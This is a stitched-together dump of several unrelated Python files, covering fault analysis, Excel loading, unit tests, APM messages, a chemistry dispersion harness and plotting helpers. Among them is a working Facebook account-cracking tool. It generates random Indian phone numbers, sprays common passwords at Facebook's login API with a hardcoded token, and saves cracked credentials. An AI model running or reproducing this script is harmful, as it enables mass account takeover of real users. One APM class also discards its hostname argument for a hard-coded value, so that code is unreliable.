for directory in os.listdir(library_dir):
if os.path.isdir(os.path.join(library_dir,directory)):
model_libraries.append(os.path.abspath(os.path.join(library_dir,directory)))
print model_libraries
get_fame_toolbox_modelica_libraries()
results = PARC_FAME_Toolkit.fault_analyze_testbench(
testbench_name, model_libraries)
except:
sys.stderr.write("Can't list faults:\n%s\n" % traceback.format_exc())
# more complicated error handling can be added here, if desired
else:
# now render it as JSON
with open(os.path.join(script_dir,'possibleFault.json'),'w') as outfile:
jsondata = json.dumps(results, indent=4)
outfile.write(jsondata)
faultCnt = 0
for i in range(len(results)):
try:
faultCnt = faultCnt + len(results[i]["modes"])
except:
pass
output(faultCnt,output_dir)
if faultCnt > 0:
keyfilename = "testbench_manifest.json"
keyfile = os.path.join(output_dir,keyfilename)
with open(keyfile,"r") as infile:
jsondata = json.load(infile, object_pairs_hook=OrderedDict)
for i in range(len(jsondata["Metrics"])):
if jsondata["Metrics"][i]["Name"] == "NumPossFaults":
jsondata["Metrics"][i]["Value"] = str(faultCnt)
jsondata["Status"] = "EXECUTED"
if jsondata["Metrics"][i]["Name"] == "NumPossibleFaults":
jsondata["Metrics"][i]["Value"] = str(faultCnt)
jsondata["Status"] = "EXECUTED"
if jsondata["Metrics"][i]["Name"] == "Number_Faults":
jsondata["Metrics"][i]["Value"] = str(faultCnt)
jsondata["Status"] = "EXECUTED"
with open(keyfile,"w") as outfile:
json.dump(jsondata,outfile, indent=4)
| python |
import logging
from openpyxl import load_workbook, Workbook
from openpyxl.utils.exceptions import InvalidFileException
class XLSXWorkbook:
def __init__(self, filename: str):
self.filename = filename
@property
def filename(self):
return self.__filename
@filename.setter
def filename(self, filename: str, discard: bool = False):
if not discard: # save modified content back to the excel if needed
try:
if self.__workbook is not None and self.__dirty:
self.__workbook.save(self.filename)
except AttributeError:
pass
# open the new excel
try:
self.__workbook = load_workbook(filename)
except InvalidFileException as e:
logging.error(f'Failed to open excel file {filename}: {e}')
self.__workbook = None
else:
self.__filename = filename
finally:
self.__dirty = False
@property
def sheet_names(self) -> list:
if self.__workbook is not None:
return self.__workbook.sheetnames
return None
if __name__ == '__main__':
workbook = XLSXWorkbook('../../../../dataset/bentre/So Lieu Man Ben Tre 2018.xlsx')
print(workbook.sheet_names)
| python |
from __future__ import annotations
from unittest import TestCase
from tests.classes.simple_book import SimpleBook
from tests.classes.simple_deadline import SimpleDeadline
class TestUpdate(TestCase):
def test_update_without_arguments_wont_change_anything(self):
book = SimpleBook(name='Thao Bvê', published=False)
book.update()
self.assertEqual(book._data_dict,
{'name': 'Thao Bvê', 'published': False})
def test_update_with_keyed_arguments_updates_value(self):
book = SimpleBook(name='Thao Bvê', published=False)
book.update(name='Thao Boê')
self.assertEqual(book._data_dict,
{'name': 'Thao Boê', 'published': False})
def test_update_set_multiple_values_at_once(self):
book = SimpleBook(name='Thao Boê', published=False)
book.update(name='Thao Bɛ', published=True)
self.assertEqual(book._data_dict,
{'name': 'Thao Bɛ', 'published': True})
def test_update_returns_self_and_is_chained(self):
book = SimpleBook(name='Thao Boê', published=False)
book.update(name='C').update(name='P') \
.update(name='T').update(name='B')
self.assertEqual(book._data_dict, {'published': False, 'name': 'B'})
def test_update_does_not_trigger_transform(self):
deadline = SimpleDeadline()
deadline.update(ended_at='2020-02-04')
self.assertEqual(deadline._data_dict,
{'ended_at': '2020-02-04', 'message': None})
def test_update_sets_back_value_to_none(self):
deadline = SimpleDeadline()
deadline.update(ended_at='2020-02-04').update(ended_at=None)
self.assertEqual(
deadline._data_dict,
{'ended_at': None, 'message': None})
def test_update_does_not_auto_convert_camelcase_keys_into_snakecase(self):
deadline = SimpleDeadline()
with self.assertRaises(ValueError):
deadline.update(**{'endedAt': '2020-02-04'})
def test_update_raises_if_given_key_is_not_allowed(self):
deadline = SimpleDeadline()
with self.assertRaises(ValueError) as context:
deadline.update(**{'name': 'a', 'value': 'b'})
self.assertRegex(str(context.exception),
"'(name|value)', '(value|name)' not allowed in "
"SimpleDeadline\\.")
| python |
#CYBER NAME BLACK-KILLER
#GITHUB: https://github.com/ShuBhamg0sain
#WHATAPP NO +919557777030
import os
CorrectUsername = "g0sain"
CorrectPassword = "sim"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[#] \x1b[0;36m Enter Username\x1b[1;92m➤ ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[#] \x1b[0;36m Enter Password\x1b[1;92m➤ ")
if (password == CorrectPassword):
print "Logged in successfully as " + username #fb-cloning-id SG
loop = 'false'
else:
print "Wrong password!"
os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
else:
print "Wrong username!"
os.system('xdg-open https://www.instagram.com/shubham_g0sain/?hl=en')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(1000000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 nmbr.py')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def t():
time.sleep(1)
def cb():
os.system('clear')
##### Dev : ShuBhamg0sain#####
##### LOGO #####
logo='''
\033[1;96m•◈•───────────────•◈•\033[1;92mShuBhamg0sain\033[1;96m•◈•───────────────•◈•
\033[1;97m
\033[1;97m :::!~!!!!!:.
\033[1;97m .xUHWH!! !!?M88WHX:.
\033[1;97m .X*#M@$!! !X!M$$$$$$WWx:.
\033[1;97m :!!!!!!?H! :!$!$$$$$$$$$$8X:
\033[1;97m !!~ ~:~!! :~!$!#$$$$$$$$$$8X:
\033[1;97m :!~::!H!< ~.U$X!?R$$$$$$$$MM!
\033[1;91m ~!~!!!! .: BLACK-KILLER$$$$RMM!
\033[1;97m !:~~~ .:!M"T#$$$$WX??#MRRMMM!
\033[1;97m ~?WuxiW*` `"#$$$$8!!!!??!!!
\033[1;97m :X- M$$$$ `"T#$T~!8$WUXU~
\033[1;97m :%` ~#$$$m: ~!~ ?$$$$$$
\033[1;97m :!`.- ~T$$$$8xx. .xWW- ~""##*"
\033[1;97m..... -~~\033[1;91m:<` ! ~?T#$$@@W@*?$$ /`
\033[1;97mW$@@M!!! .!~~ \033[1;91m!! .:XUW$W!~ `"~: :
\033[1;97m#"~~`.:x%`!! \033[1;91m!H: !WM$$$$Ti.: .!WUn+!`
\033[1;97m:::~:!!`:X~ .:\033[1;92m ?H.!u "$$$B$$$!W:U!T$$M~
\033[1;97m.~~ :X@!.-~ \033[1;92m?@WTWo("*$$$W$TH$! `
\033[1;97mWi.~!X$?!-~ : \033[1;92m?$$$B$Wu("**$RM!
\033[1;97m$R@i.~~ ! : \033[1;92m~$$$$$B$$en:``
\033[1;97m?MXT@Wx.~ : \033[1;92m~"##*$$$$M~
\033[1;47m \033[1;31mShuBhamg0sain \033[1;0m
\x1b[1;93m--------------------------------------------------------------
\x1b[1;92m➣ NAME : Shubhamg0sain
\x1b[1;91m➣ CYBER NAME : BLACK-KILLER
\x1b[1;93m➣ WHATSAPP NO : +919557777030
\x1b[1;95m➣ WARNING : DON,T CALL ME ONLY TEXT
\x1b[1;97m➣ NOTE : USE FAST 4G SIM NET
\x1b[1;93m--------------------------------------------------------------"""
'''
back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
os.system('clear')
print logo
print "\033[1;92mCYBER_HACKER_GLAXY_R.H.P_1.286-Wellcome"
print
print "\033[1;91mATTACK ON Indian Ids"
print "\033[1;92m[1] starter 919"
print "\033[1;92m[2] starter 918 "
print "\033[1;92m[3] starter 917"
print "\033[1;92m[4] my whatapp group"
print "\033[1;92m[5] my instagram id"
print "\033[1;92m[6] UPDATE SYSTEM"
print "\033[1;92m[0] FOR EXIT"
print 50*'-'
action()
def action():
bch = raw_input('\n ENTER HERE ANY NUMBER ')
if bch =='':
print '[!] Fill in correctly'
action()
elif bch =="1":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;95m560, 650, 717, 810, 871, 818, 871, 910, 958, 971, 540, 718, 891, 911, 990, 716"
print "\033[1;95m582, 654, 711, 811, 873, 899, 953, 999, 015, 310, 311, 312, 313, 350, 555"
try:
c = raw_input(" SELECTED CODE: ")
k="+919"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;94m130, 527, 800, 826, 506, 510, 512, 743, 744, 745, 750, 595, 882, 285, 802"
print "\033[1;95m375, 376, 377, 447, 586, 587, 588, 860, 010, 287, 467, 468, 470, 471"
try:
c = raw_input(" SELECTED CODE: ")
k="+918"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
os.system("clear")
print (logo)
print "\033[1;91mENTER THE CODE HERE"
print "\033[1;94m011, 838, 428, 827"
print "\033[1;95m861, 862, 863, 503"
try:
c = raw_input(" SELECTED CODE: ")
k="+917"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system('xdg-open https://chat.whatsapp.com/JtCW38B01hjAGwlVHhyu5q')
print "\033[1;91mrun allsim by python2 S.py"
elif bch =="5":
os.system('xdg-open https://www.instagram.com/shubham_g0sai')
print "\033[1;91mrun allsim by python2 S.py"
elif bch =="6":
os.system("clear")
os.system("pip2 install --upgrade balln")
os.system("pip2 install --upgrade balln")
os.system("clear")
print(logo)
print
psb (" Tool has been successfully updated")
time.sleep(2)
os.system("python2 S.py")
# elif chb =='3':
# os.system('xdg-open https://www.facebook.com/100002059014174/posts/2677733205638620/?substory_index=0&app=fbl')
# time.sleep(1)
# menu()
elif bch =='0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb ('[✓] Total Numbers: '+xxx)
time.sleep(0.5)
psb ('[✓] Please wait, process is running ...')
time.sleep(0.5)
psb ('[!] (for Exit) Press CTRL Then Press z')
time.sleep(0.5)
print 50*'-'
print
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = '786786'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3 = k + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4 = 'india123'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass4 = 'india1234'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mBLACK-KILLER-HACKED√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(3DAYS)🗝\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50*'-'
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
os.system('python2 S.py')
if __name__ == '__main__':
menu()
| python |
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import re
from scout_apm.compat import iteritems
logger = logging.getLogger(__name__)
key_regex = re.compile(r"^[a-zA-Z0-9]{20}$")
class Register(object):
__slots__ = ("app", "key", "hostname")
def __init__(self, app, key, hostname):
self.app = app
self.key = key
self.hostname = "force_set_hostname"
def message(self):
key_prefix = self.key[:3]
key_matches_regex = bool(key_regex.match(self.key))
logger.info(
"Registering with app=%s key_prefix=%s key_format_validated=%s host=%s"
% (self.app, key_prefix, key_matches_regex, self.hostname)
)
return {
"Register": {
"app": self.app,
"key": self.key,
"host": self.hostname,
"language": "python",
"api_version": "1.0",
}
}
class StartSpan(object):
__slots__ = ("timestamp", "request_id", "span_id", "parent", "operation")
def __init__(self, timestamp, request_id, span_id, parent, operation):
self.timestamp = timestamp
self.request_id = request_id
self.span_id = span_id
self.parent = parent
self.operation = operation
def message(self):
return {
"StartSpan": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"span_id": self.span_id,
"parent_id": self.parent,
"operation": self.operation,
}
}
class StopSpan(object):
__slots__ = ("timestamp", "request_id", "span_id")
def __init__(self, timestamp, request_id, span_id):
self.timestamp = timestamp
self.request_id = request_id
self.span_id = span_id
def message(self):
return {
"StopSpan": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"span_id": self.span_id,
}
}
class StartRequest(object):
__slots__ = ("timestamp", "request_id")
def __init__(self, timestamp, request_id):
self.timestamp = timestamp
self.request_id = request_id
def message(self):
return {
"StartRequest": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
}
}
class FinishRequest(object):
__slots__ = ("timestamp", "request_id")
def __init__(self, timestamp, request_id):
self.timestamp = timestamp
self.request_id = request_id
def message(self):
return {
"FinishRequest": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
}
}
class TagSpan(object):
__slots__ = ("timestamp", "request_id", "span_id", "tag", "value")
def __init__(self, timestamp, request_id, span_id, tag, value):
self.timestamp = timestamp
self.request_id = request_id
self.span_id = span_id
self.tag = tag
self.value = value
def message(self):
return {
"TagSpan": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"span_id": self.span_id,
"tag": self.tag,
"value": self.value,
}
}
class TagRequest(object):
__slots__ = ("timestamp", "request_id", "tag", "value")
def __init__(self, timestamp, request_id, tag, value):
self.timestamp = timestamp
self.request_id = request_id
self.tag = tag
self.value = value
def message(self):
return {
"TagRequest": {
"timestamp": self.timestamp.isoformat() + "Z",
"request_id": self.request_id,
"tag": self.tag,
"value": self.value,
}
}
class ApplicationEvent(object):
__slots__ = ("event_type", "event_value", "source", "timestamp")
def __init__(self, event_type, event_value, source, timestamp):
self.event_type = event_type
self.event_value = event_value
self.source = source
self.timestamp = timestamp
def message(self):
return {
"ApplicationEvent": {
"timestamp": self.timestamp.isoformat() + "Z",
"event_type": self.event_type,
"event_value": self.event_value,
"source": self.source,
}
}
class BatchCommand(object):
__slots__ = ("commands",)
def __init__(self, commands):
self.commands = commands
def message(self):
return {
"BatchCommand": {
"commands": [command.message() for command in self.commands]
}
}
@classmethod
def from_tracked_request(cls, request):
# The TrackedRequest must be finished
commands = []
commands.append(
StartRequest(timestamp=request.start_time, request_id=request.request_id)
)
for key, value in iteritems(request.tags):
commands.append(
TagRequest(
timestamp=request.start_time,
request_id=request.request_id,
tag=key,
value=value,
)
)
for span in request.complete_spans:
commands.append(
StartSpan(
timestamp=span.start_time,
request_id=span.request_id,
span_id=span.span_id,
parent=span.parent,
operation=span.operation,
)
)
for key, value in iteritems(span.tags):
commands.append(
TagSpan(
timestamp=span.start_time,
request_id=request.request_id,
span_id=span.span_id,
tag=key,
value=value,
)
)
commands.append(
StopSpan(
timestamp=span.end_time,
request_id=span.request_id,
span_id=span.span_id,
)
)
commands.append(
FinishRequest(timestamp=request.end_time, request_id=request.request_id)
)
return cls(commands)
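# Illustrative wire format produced by one of these commands (note that the
# hostname argument is currently overridden by the hard-coded value):
#
#   Register(app="myapp", key="abcdefghij1234567890", hostname="web-1").message()
#   -> {"Register": {"app": "myapp", "key": "abcdefghij1234567890",
#                    "host": "force_set_hostname", "language": "python",
#                    "api_version": "1.0"}}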
| python |
"""Compute dispersion correction using Greenwell & Beran's MP2D executable."""
import pprint
import re
import sys
from decimal import Decimal
from typing import Any, Dict, Optional, Tuple
import numpy as np
import qcelemental as qcel
from qcelemental.models import AtomicResult, Provenance
from qcelemental.util import safe_version, which
from ..exceptions import InputError, ResourceError, UnknownError
from ..util import execute
from . import empirical_dispersion_resources
from .model import ProgramHarness
pp = pprint.PrettyPrinter(width=120, compact=True, indent=1)
class MP2DHarness(ProgramHarness):
_defaults = {
"name": "MP2D",
"scratch": True,
"thread_safe": True,
"thread_parallel": False,
"node_parallel": False,
"managed_memory": False,
}
version_cache: Dict[str, str] = {}
class Config(ProgramHarness.Config):
pass
@staticmethod
def found(raise_error: bool = False) -> bool:
return which(
"mp2d",
return_bool=True,
raise_error=raise_error,
raise_msg="Please install via `conda install mp2d -c psi4`",
)
def get_version(self) -> str:
self.found(raise_error=True)
which_prog = which("mp2d")
if which_prog not in self.version_cache:
# Note: anything below v1.1 will return an input error message here. but that's fine as version compare evals to False.
command = [which_prog, "--version"]
import subprocess
proc = subprocess.run(command, stdout=subprocess.PIPE)
self.version_cache[which_prog] = safe_version(proc.stdout.decode("utf-8").strip())
return self.version_cache[which_prog]
def compute(self, input_model: "AtomicInput", config: "TaskConfig") -> "AtomicResult":
from ..testing import is_program_new_enough
self.found(raise_error=True)
if not is_program_new_enough("mp2d", "1.1"):
raise ResourceError(f"MP2D version '{self.get_version()}' too old. Please update to at least '1.1'.")
job_inputs = self.build_input(input_model, config)
success, dexe = self.execute(job_inputs)
if success:
dexe["outfiles"]["stdout"] = dexe["stdout"]
dexe["outfiles"]["stderr"] = dexe["stderr"]
output_model = self.parse_output(dexe["outfiles"], input_model)
else:
output_model = input_model
output_model["error"] = {"error_type": "execution_error", "error_message": dexe["stderr"]}
return output_model
def execute(
self, inputs: Dict[str, Any], *, extra_outfiles=None, extra_commands=None, scratch_name=None, timeout=None
) -> Tuple[bool, Dict]:
success, dexe = execute(
inputs["command"],
inputs["infiles"],
inputs["outfiles"],
scratch_messy=False,
scratch_directory=inputs["scratch_directory"],
)
return success, dexe
def build_input(
self, input_model: "AtomicInput", config: "TaskConfig", template: Optional[str] = None
) -> Dict[str, Any]:
# strip engine hint
mtd = input_model.model.method
if mtd.startswith("mp2d-"):
mtd = mtd[5:]
if input_model.driver.derivative_int() > 1:
raise InputError(f"Driver {input_model.driver} not implemented for MP2D.")
# temp until actual options object
input_model.extras["info"] = empirical_dispersion_resources.from_arrays(
name_hint=mtd,
level_hint=input_model.keywords.get("level_hint", None),
param_tweaks=input_model.keywords.get("params_tweaks", None),
dashcoeff_supplement=input_model.keywords.get("dashcoeff_supplement", None),
)
# Need 'real' field later and that's only guaranteed for molrec
molrec = qcel.molparse.from_schema(input_model.molecule.dict())
xyz = qcel.molparse.to_string(molrec, dtype="xyz", units="Angstrom", ghost_format="")
infiles = {"mp2d_geometry": xyz}
# jobrec['molecule']['real'] = molrec['real']
# env = {
# 'HOME': os.environ.get('HOME'),
# 'PATH': os.environ.get('PATH'),
# #'PATH': os.pathsep.join([os.path.abspath(x) for x in os.environ.get('PSIPATH', '').split(os.pathsep) if x != '']) + \
# # os.pathsep + os.environ.get('PATH'),
# #'LD_LIBRARY_PATH': os.environ.get('LD_LIBRARY_PATH'),
# }
command = ["mp2d", "mp2d_geometry"]
command.extend(
"""--TT_a1={a1} --TT_a2={a2} --rcut={rcut} --w={w} --s8={s8}""".format(
**input_model.extras["info"]["dashparams"]
).split()
)
if input_model.driver == "gradient":
command.append("--gradient")
return {
"command": command,
"infiles": infiles,
"outfiles": ["mp2d_gradient"],
"scratch_directory": config.scratch_directory,
"input_result": input_model.copy(deep=True),
}
def parse_output(self, outfiles: Dict[str, str], input_model: "AtomicInput") -> "AtomicResult":
stdout = outfiles.pop("stdout")
for fl, contents in outfiles.items():
if contents is not None:
# LOG text += f'\n MP2D scratch file {fl} has been read.\n'
pass
# parse energy output (could go further and break into UCHF, CKS)
real = np.array(input_model.molecule.real)
full_nat = real.shape[0]
real_nat = np.sum(real)
for ln in stdout.splitlines():
if re.match(" MP2D dispersion correction Eh", ln):
ene = Decimal(ln.split()[4])
elif re.match("Atomic Coordinates in Angstroms", ln):
break
else:
if not ((real_nat == 1) and (input_model.driver == "gradient")):
raise UnknownError("Unknown issue occured.")
# parse gradient output
if outfiles["mp2d_gradient"] is not None:
srealgrad = outfiles["mp2d_gradient"]
realgrad = np.fromstring(srealgrad, count=3 * real_nat, sep=" ").reshape((-1, 3))
if input_model.driver == "gradient":
ireal = np.argwhere(real).reshape((-1))
fullgrad = np.zeros((full_nat, 3))
try:
fullgrad[ireal, :] = realgrad
except NameError as exc:
raise UnknownError("Unsuccessful gradient collection.") from exc
qcvkey = input_model.extras["info"]["fctldash"].upper()
calcinfo = []
calcinfo.append(qcel.Datum("CURRENT ENERGY", "Eh", ene))
calcinfo.append(qcel.Datum("DISPERSION CORRECTION ENERGY", "Eh", ene))
calcinfo.append(qcel.Datum("2-BODY DISPERSION CORRECTION ENERGY", "Eh", ene))
if qcvkey:
calcinfo.append(qcel.Datum(f"{qcvkey} DISPERSION CORRECTION ENERGY", "Eh", ene))
if input_model.driver == "gradient":
calcinfo.append(qcel.Datum("CURRENT GRADIENT", "Eh/a0", fullgrad))
calcinfo.append(qcel.Datum("DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
calcinfo.append(qcel.Datum("2-BODY DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
if qcvkey:
calcinfo.append(qcel.Datum(f"{qcvkey} DISPERSION CORRECTION GRADIENT", "Eh/a0", fullgrad))
# LOGtext += qcel.datum.print_variables({info.label: info for info in calcinfo})
calcinfo = {info.label: info.data for info in calcinfo}
# calcinfo = qcel.util.unnp(calcinfo, flat=True)
# got to even out who needs plump/flat/Decimal/float/ndarray/list
# Decimal --> str preserves precision
calcinfo = {
k.upper(): str(v) if isinstance(v, Decimal) else v for k, v in qcel.util.unnp(calcinfo, flat=True).items()
}
# jobrec['properties'] = {"return_energy": ene}
# jobrec["molecule"]["real"] = list(jobrec["molecule"]["real"])
retres = calcinfo[f"CURRENT {input_model.driver.upper()}"]
if isinstance(retres, Decimal):
retres = float(retres)
elif isinstance(retres, np.ndarray):
retres = retres.ravel().tolist()
output_data = {
"extras": input_model.extras,
"properties": {},
"provenance": Provenance(
creator="MP2D", version=self.get_version(), routine=__name__ + "." + sys._getframe().f_code.co_name
),
"return_result": retres,
"stdout": stdout,
}
output_data["extras"]["local_keywords"] = input_model.extras["info"]
output_data["extras"]["qcvars"] = calcinfo
output_data["success"] = True
return AtomicResult(**{**input_model.dict(), **output_data})
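# A minimal usage sketch (illustrative only; in practice this harness is driven by
# the qcengine runner, and the exact method string accepted by
# empirical_dispersion_resources.from_arrays may differ):
#
#   import qcelemental as qcel
#   mol = qcel.models.Molecule(symbols=["Ne", "Ne"], geometry=[0, 0, 0, 0, 0, 3.0])
#   inp = qcel.models.AtomicInput(molecule=mol, driver="energy",
#                                 model={"method": "mp2d-dmp2"})
#   result = MP2DHarness().compute(inp, config)  # `config` is the runner's TaskConfig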
| python |
__all__ = ["partitionN"]
from partition import *
| python |
# yellowbrick.utils.helpers
# Helper functions and generic utilities for use in Yellowbrick code.
#
# Author: Benjamin Bengfort <[email protected]>
# Created: Fri May 19 10:39:30 2017 -0700
#
# Copyright (C) 2017 District Data Labs
# For license information, see LICENSE.txt
#
# ID: helpers.py [79cd8cf] [email protected] $
"""
Helper functions and generic utilities for use in Yellowbrick code.
"""
##########################################################################
## Imports
##########################################################################
from __future__ import division
import re
import numpy as np
from sklearn.pipeline import Pipeline
from .types import is_estimator
from yellowbrick.exceptions import YellowbrickTypeError
##########################################################################
## Model and Feature Information
##########################################################################
def get_model_name(model):
"""
Detects the model name for a Scikit-Learn model or pipeline.
Parameters
----------
model: class or instance
The object to determine the name for. If the model is an estimator it
returns the class name; if it is a Pipeline it returns the class name
of the final transformer or estimator in the Pipeline.
Returns
-------
name : string
The name of the model or pipeline.
"""
if not is_estimator(model):
raise YellowbrickTypeError(
"Cannot detect the model name for non estimator: '{}'".format(
type(model)
)
)
else:
if isinstance(model, Pipeline):
return get_model_name(model.steps[-1][-1])
else:
return model.__class__.__name__
def has_ndarray_int_columns(features, X):
""" Checks if numeric feature columns exist in ndarray """
_, ncols = X.shape
if not all(d.isdigit() for d in features if isinstance(d, str)) or not isinstance(X, np.ndarray):
return False
ndarray_columns = np.arange(0, ncols)
feature_cols = np.unique([int(d) for d in features])
return all(np.in1d(feature_cols, ndarray_columns))
# Alias for closer name to isinstance and issubclass
hasndarrayintcolumns = has_ndarray_int_columns
def is_monotonic(a, increasing=True):
"""
Tests whether a vector a has monotonicity.
Parameters
----------
a : array-like
